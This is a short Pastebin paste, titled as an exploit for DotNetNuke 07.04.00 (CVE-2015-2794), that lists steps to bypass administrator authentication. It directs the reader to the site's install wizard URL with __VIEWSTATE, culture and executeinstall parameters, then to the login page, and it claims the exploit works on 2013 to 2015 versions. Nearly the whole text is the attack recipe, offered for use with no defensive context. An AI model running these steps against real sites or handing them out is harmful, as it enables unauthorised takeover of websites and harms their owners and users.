Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass
- # CVE: CVE-2015-2794
- Step 1: find Dotnetnuke ver 07.04.00
- Step 2: /Install/InstallWizard.aspx?__VIEWSTATE=
- Step 3: Fill all infor
- Step 4: CLick continue if it don't work, just add &culture=en-US&executeinstall
- or you get any error ex: 500,... just removing __VIEWSTATE=
- Install/InstallWizard.aspx?culture=en-US&executeinstall
- Step 5: Login /Home/tabid/36/ctl/Login/Default.aspx
- -> This Exploit work on 2013,2014,2015 version!
Add Comment
Please, Sign In to add comment